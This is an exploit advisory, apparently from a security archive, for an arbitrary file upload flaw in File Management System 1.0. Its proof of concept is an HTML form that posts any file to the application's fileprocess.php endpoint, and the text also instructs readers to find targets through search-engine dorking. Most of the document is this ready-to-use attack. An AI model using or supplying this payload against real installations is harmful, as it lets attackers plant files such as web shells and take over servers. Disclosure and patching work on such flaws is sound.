Headline
File Management System 1.0 Arbitrary File Upload
File Management System version 1.0 suffers from an arbitrary file upload vulnerability.
=============================================================================================================================================| # Title : File Management System 1.0 Arbitrary File upload Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 1 : Set your target.[+] Save As poc.html[+] Payload : <form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data"> <!-- Hidden Email Input --> <input type="hidden" name="email" value=""> <!-- File Input --> <label for="myfile">Upload File:</label> <input type="file" id="myfile" name="myfile" required> <!-- Submit Button --> <input type="submit" name="save" value="Save"></form>[+] /uploads/ Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================